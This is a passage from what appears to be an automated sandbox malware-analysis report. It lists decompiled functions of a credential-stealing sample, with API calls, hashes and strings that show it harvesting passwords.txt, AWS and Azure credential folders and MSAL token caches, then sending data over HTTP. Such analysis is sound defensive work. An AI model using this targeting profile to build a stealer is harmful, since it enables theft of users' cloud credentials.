                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileOptionProcessReadSend
                                                        • String ID: "$------$CNA$CNA$build_id$mode
                                                        • API String ID: 487080699-4084655683
                                                        • Opcode ID: 96eba014d5c239abca33f47b00a9d0632a2895fbae30eeae242752f0f911d295
                                                        • Instruction ID: 133adc88af5b3158e35ace1f7ad7f702ad5e72aedf245dc5e4082de3823685dd
                                                        • Opcode Fuzzy Hash: 96eba014d5c239abca33f47b00a9d0632a2895fbae30eeae242752f0f911d295
                                                        • Instruction Fuzzy Hash: DF12CF72C00019AACB15EBE2DC96CEE777DAF24308F40497BF516B20D1EF396655CA98
                                                        Function 0040B5F7 Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 264stringmemoryfileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                          • Part of subcall function 0040F6C3: GetSystemTime.KERNEL32(00000000,0041E266,0041E266,00421EE4,00000000), ref: 0040F6EC
                                                          • Part of subcall function 0040E6E6: lstrlenA.KERNEL32(?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E6FE
                                                          • Part of subcall function 0040E6E6: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E726
                                                          • Part of subcall function 0040E6E6: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E731
                                                          • Part of subcall function 0040E694: lstrcpyA.KERNEL32(00000000,?,0041E266,00000000,00421EE4,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6CD
                                                          • Part of subcall function 0040E694: lstrcatA.KERNEL32(?,?,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6D7
                                                          • Part of subcall function 0040E64D: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BBB,00000000,?,?,00421420,?,00000000), ref: 0040E686
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,?,0041E264,?,00000000,0041E266,0041E266), ref: 0040B6B3
                                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040B70A
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0040B711
                                                        • lstrlenA.KERNEL32(00000000,00000000), ref: 0040B7A6
                                                        • lstrcatA.KERNEL32(?), ref: 0040B7BE
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040B7D0
                                                        • lstrcatA.KERNEL32(?,004214C8), ref: 0040B7DE
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040B7F0
                                                        • lstrcatA.KERNEL32(?,004214C4), ref: 0040B7FE
                                                        • lstrcatA.KERNEL32(?), ref: 0040B80D
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040B81F
                                                        • lstrcatA.KERNEL32(?,00421414), ref: 0040B829
                                                        • lstrcatA.KERNEL32(?), ref: 0040B838
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040B84A
                                                        • lstrcatA.KERNEL32(?,00421414), ref: 0040B854
                                                        • lstrcatA.KERNEL32(?), ref: 0040B863
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040B875
                                                        • lstrcatA.KERNEL32(?,00421414), ref: 0040B87F
                                                        • lstrcatA.KERNEL32(?,00421414), ref: 0040B889
                                                        • lstrlenA.KERNEL32(?), ref: 0040B8B5
                                                        • memset.MSVCRT ref: 0040B8FB
                                                        • DeleteFileA.KERNEL32(00000000), ref: 0040B928
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                        • String ID: passwords.txt
                                                        • API String ID: 1973479514-347816968
                                                        • Opcode ID: c691d8ed6728e35738473081f5c9d2684a8cb2161a219e6661f70b48d249baad
                                                        • Instruction ID: 75100367a0416a015ccbdb2d3404af5e66dc933c3ecc7295ef5da7218b285e0b
                                                        • Opcode Fuzzy Hash: c691d8ed6728e35738473081f5c9d2684a8cb2161a219e6661f70b48d249baad
                                                        • Instruction Fuzzy Hash: 6EA10A72900118BFDB04EBA2ED4ACED7B7AEF14305B50483AF506B20E1EF355A15DB65
                                                        Function 00401134 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 124memoryfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00401154
                                                        • wsprintfW.USER32 ref: 0040117A
                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 004011AA
                                                        • GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004011BF
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004011C6
                                                        • _time64.MSVCRT ref: 004011CF
                                                        • srand.MSVCRT ref: 004011D5
                                                        • rand.MSVCRT ref: 004011DA
                                                        • memset.MSVCRT ref: 004011EA
                                                        • WriteFile.KERNEL32(?,00000000,000FFFFF,000007CE,00000000), ref: 004011FC
                                                        • memset.MSVCRT ref: 00401216
                                                        • FindCloseChangeNotification.KERNEL32(?), ref: 00401221
                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040123D
                                                        • ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 00401253
                                                        • memset.MSVCRT ref: 00401265
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040126F
                                                        • RtlFreeHeap.NTDLL(00000000), ref: 00401276
                                                        • CloseHandle.KERNEL32(?), ref: 0040127F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileHeap$memset$CloseCreateProcess$AllocateChangeFindFreeHandleNotificationPathReadTempWrite_time64randsrandwsprintf
                                                        • String ID: %s%s$delays.tmp
                                                        • API String ID: 3969031204-1413376734
                                                        • Opcode ID: 6a1ae1335c7996ddd81de9e37eefdf4718ecf5a287f21dfdca138a4e6956ef96
                                                        • Instruction ID: 2b6944e1244f0e7c9d38526114ef467838b5f2f02e4e4778a1e4811b7b1c530c
                                                        • Opcode Fuzzy Hash: 6a1ae1335c7996ddd81de9e37eefdf4718ecf5a287f21dfdca138a4e6956ef96
                                                        • Instruction Fuzzy Hash: C031D275900218BBDB20ABA6DC49EEF7F7CEF89740F00457AF915F2190D6788A50CA75
                                                        Function 00414695 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 125stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memset.MSVCRT ref: 004146B0
                                                          • Part of subcall function 0040F84D: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0040F87B
                                                        • lstrcatA.KERNEL32(?,00000000,?,?,00000000,?,00421EE4), ref: 004146D2
                                                        • lstrcatA.KERNEL32(?,\.azure\,?,?,00000000,?,00421EE4), ref: 004146EC
                                                          • Part of subcall function 0041425C: wsprintfA.USER32 ref: 00414277
                                                          • Part of subcall function 0041425C: FindFirstFileA.KERNEL32(?,?), ref: 0041428E
                                                          • Part of subcall function 0041425C: StrCmpCA.SHLWAPI(?,0041E258), ref: 004142BB
                                                          • Part of subcall function 0041425C: StrCmpCA.SHLWAPI(?,0041E254), ref: 004142D5
                                                          • Part of subcall function 0041425C: wsprintfA.USER32 ref: 004142F5
                                                          • Part of subcall function 0041425C: StrCmpCA.SHLWAPI(?,0041E266), ref: 00414302
                                                          • Part of subcall function 0041425C: wsprintfA.USER32 ref: 0041431F
                                                          • Part of subcall function 0041425C: PathMatchSpecA.SHLWAPI(?,?), ref: 00414342
                                                          • Part of subcall function 0041425C: lstrcatA.KERNEL32(?,?,000003E8), ref: 0041436E
                                                          • Part of subcall function 0041425C: lstrcatA.KERNEL32(?,0041E264), ref: 0041437C
                                                          • Part of subcall function 0041425C: lstrcatA.KERNEL32(?,?), ref: 0041438C
                                                          • Part of subcall function 0041425C: lstrcatA.KERNEL32(?,0041E264), ref: 0041439A
                                                          • Part of subcall function 0041425C: lstrcatA.KERNEL32(?,?), ref: 004143AE
                                                        • memset.MSVCRT ref: 00414727
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0041474E
                                                        • lstrcatA.KERNEL32(?,\.aws\), ref: 00414768
                                                          • Part of subcall function 0041425C: wsprintfA.USER32 ref: 0041432F
                                                          • Part of subcall function 0041425C: FindNextFileA.KERNEL32(?,?), ref: 004144FD
                                                        • memset.MSVCRT ref: 00414799
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 004147C0
                                                        • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 004147DA
                                                          • Part of subcall function 0041425C: FindClose.KERNEL32(?), ref: 0041450E
                                                        • memset.MSVCRT ref: 0041480F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$memsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                        • String ID: &QA$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                        • API String ID: 515946987-931222800
                                                        • Opcode ID: d88c107a523a3da39854e4529c79d7a5b049c0e7be2811a826c029894fcd0ca6
                                                        • Instruction ID: 5f546c70494931130e9c97f9f11981a4bccc5808e7d53dc622f618079870cb16
                                                        • Opcode Fuzzy Hash: d88c107a523a3da39854e4529c79d7a5b049c0e7be2811a826c029894fcd0ca6
                                                        • Instruction Fuzzy Hash: 59418672E4021C76DF15F7B1DC4BFDE33ACAF58344F40487AB625A7081EA7896848B65
                                                        Function 00406E2D Relevance: 31.9, APIs: 21, Instructions: 425stringmemoryfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040E753: StrCmpCA.SHLWAPI(?,?,?,00408AAC,0042141C,00000000), ref: 0040E75C
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,?,0041E264,?,00000000,0041E266,0041E264,0041E266,?), ref: 00406F33
                                                          • Part of subcall function 0040E5C6: lstrcpyA.KERNEL32(00000000,FEE8858D,00414CC5,?,?,00401334,00414CC5,0041E266,00000000,?,00414CC5,?), ref: 0040E5EC
                                                          • Part of subcall function 0040FB7B: memset.MSVCRT ref: 0040FB98
                                                          • Part of subcall function 0040FB7B: OpenProcess.KERNEL32(00001001,00000000,?,0041E264,0041E266,?,004090C7), ref: 0040FC1F
                                                          • Part of subcall function 0040FB7B: TerminateProcess.KERNEL32(00000000,00000000,?,004090C7), ref: 0040FC2D
                                                          • Part of subcall function 0040FB7B: CloseHandle.KERNEL32(00000000,?,004090C7), ref: 0040FC34
                                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040706C
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00407073
                                                          • Part of subcall function 0040E6E6: lstrlenA.KERNEL32(?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E6FE
                                                          • Part of subcall function 0040E6E6: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E726
                                                          • Part of subcall function 0040E6E6: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E731
                                                          • Part of subcall function 0040E64D: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BBB,00000000,?,?,00421420,?,00000000), ref: 0040E686
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                        • lstrcatA.KERNEL32(?,00000000,00000000,0042141C,0042141C,00000000), ref: 00407185
                                                        • lstrcatA.KERNEL32(?,00421418), ref: 0040718F
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 004071A1
                                                        • lstrcatA.KERNEL32(?,00421418), ref: 004071AB
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 004071BD
                                                        • lstrcatA.KERNEL32(?,00421418), ref: 004071C7
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 004071D9
                                                        • lstrcatA.KERNEL32(?,00421418), ref: 004071E3
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 004071F5
                                                        • lstrcatA.KERNEL32(?,00421418), ref: 004071FF
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00407211
                                                        • lstrcatA.KERNEL32(?,00421418), ref: 0040721B
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040725A
                                                        • lstrcatA.KERNEL32(?,00421414), ref: 00407270
                                                        • lstrlenA.KERNEL32(?), ref: 004072BC
                                                        • lstrlenA.KERNEL32(?), ref: 004072CA
                                                        • memset.MSVCRT ref: 0040730E
                                                        • DeleteFileA.KERNEL32(00000000), ref: 00407333
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$lstrcpy$Processlstrlen$FileHeapmemset$AllocateCloseCopyDeleteHandleOpenTerminate
                                                        • String ID:
                                                        • API String ID: 1765998009-0
                                                        • Opcode ID: 1f89231de185f8184ad7ce82077fab06fb3b98a7611298477f4c77d79abfed83
                                                        • Instruction ID: 2889f2c443b3a9ca4624affe1960d8fbef91168e06a20097119cae65a308bc08
                                                        • Opcode Fuzzy Hash: 1f89231de185f8184ad7ce82077fab06fb3b98a7611298477f4c77d79abfed83
                                                        • Instruction Fuzzy Hash: B3E12C71800109AFDF14EBA2EC56CEE7B79EF20309B50483AF506720E1EF396A15DB65
                                                        Function 00408809 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                          • Part of subcall function 0040F6C3: GetSystemTime.KERNEL32(00000000,0041E266,0041E266,00421EE4,00000000), ref: 0040F6EC
                                                          • Part of subcall function 0040E6E6: lstrlenA.KERNEL32(?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E6FE
                                                          • Part of subcall function 0040E6E6: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E726
                                                          • Part of subcall function 0040E6E6: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E731
                                                          • Part of subcall function 0040E694: lstrcpyA.KERNEL32(00000000,?,0041E266,00000000,00421EE4,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6CD
                                                          • Part of subcall function 0040E694: lstrcatA.KERNEL32(?,?,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6D7
                                                          • Part of subcall function 0040E64D: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BBB,00000000,?,?,00421420,?,00000000), ref: 0040E686
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,?,0041E264,?,00000000,0041E266,00000000,0041E266), ref: 004088C7
                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004089DC
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004089E3
                                                          • Part of subcall function 0040E753: StrCmpCA.SHLWAPI(?,?,?,00408AAC,0042141C,00000000), ref: 0040E75C
                                                        • lstrcatA.KERNEL32(?,00000000,0042141C,0042141C,00000000), ref: 00408AF5
                                                        • lstrcatA.KERNEL32(?,00421418), ref: 00408AFF
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00408B11
                                                        • lstrcatA.KERNEL32(?,00421418), ref: 00408B1B
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00408B2D
                                                        • lstrcatA.KERNEL32(?,00421418), ref: 00408B37
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00408B49
                                                        • lstrcatA.KERNEL32(?,00421418), ref: 00408B53
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00408B65
                                                        • lstrcatA.KERNEL32(?,00421418), ref: 00408B6F
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00408B81
                                                        • lstrcatA.KERNEL32(?,00421418), ref: 00408B8B
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00408B9D
                                                        • lstrcatA.KERNEL32(?,00421414), ref: 00408BAB
                                                        • lstrlenA.KERNEL32(?), ref: 00408BFF
                                                        • lstrlenA.KERNEL32(?), ref: 00408C0D
                                                          • Part of subcall function 0041296A: _MSFOpenExW.MSPDB140-MSVCRT ref: 00412A12
                                                          • Part of subcall function 0041296A: CreateThread.KERNEL32(00000000,00000000,004118D1,?,00000000,00000000), ref: 00412A27
                                                          • Part of subcall function 0041296A: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00412A2F
                                                        • memset.MSVCRT ref: 00408C52
                                                        • DeleteFileA.KERNEL32(00000000), ref: 00408C77
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyCreateDeleteObjectOpenProcessSingleSystemThreadTimeWaitmemset
                                                        • String ID:
                                                        • API String ID: 265204971-0
                                                        • Opcode ID: 5ac62e8a49d88cf1d7b63d38431e159ffc10b53734be3c14e5a843aace8708cb
                                                        • Instruction ID: 87d003cdb97d28a3660b14345ea9f914e01a8679d5b631e8e5386e8aee29e390
                                                        • Opcode Fuzzy Hash: 5ac62e8a49d88cf1d7b63d38431e159ffc10b53734be3c14e5a843aace8708cb
                                                        • Instruction Fuzzy Hash: 85D11D72900018AFDB14EBA2DD56CEE7B79EF14309F10093AF406B20E2EF356A55DB65
                                                        Function 0040F311 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 149memorycomtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 0040F316
                                                        • CoInitializeEx.OLE32(00000000,00000000,00421690,00421414,00421EE4,?,?,?,?,00421690,00000000,?,Work Dir: In memory,00000000,?,00421414), ref: 0040F32B
                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00421690,00000000,?), ref: 0040F33C
                                                        • CoCreateInstance.OLE32(004229F8,00000000,00000001,00422928,?,?,?,?,?,00421690,00000000,?,Work Dir: In memory,00000000,?,00421414), ref: 0040F356
                                                        • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,?,?,00421690,00000000,?,Work Dir: In memory), ref: 0040F38C
                                                        • VariantInit.OLEAUT32(?), ref: 0040F3E7
                                                          • Part of subcall function 0040F249: _EH_prolog.MSVCRT ref: 0040F24E
                                                          • Part of subcall function 0040F249: CoCreateInstance.OLE32(004227A8,00000000,00000001,004218D8,?,00421690,00000000,00421EE4), ref: 0040F278
                                                          • Part of subcall function 0040F249: SysAllocString.OLEAUT32(NA), ref: 0040F285
                                                          • Part of subcall function 0040F249: _wtoi64.MSVCRT ref: 0040F2C0
                                                          • Part of subcall function 0040F249: SysFreeString.OLEAUT32(?), ref: 0040F2DB
                                                          • Part of subcall function 0040F249: SysFreeString.OLEAUT32(00000000), ref: 0040F2E2
                                                        • FileTimeToSystemTime.KERNEL32(?,00421414,?,?,?,?,?,?,?,00421690,00000000,?,Work Dir: In memory,00000000,?,00421414), ref: 0040F41B
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,?,?,00421690,00000000,?,Work Dir: In memory,00000000,?,00421414), ref: 0040F427
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,00421690,00000000,?,Work Dir: In memory,00000000,?,00421414,00000000), ref: 0040F42E
                                                        • VariantClear.OLEAUT32(?), ref: 0040F470
                                                        • wsprintfA.USER32 ref: 0040F45A
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
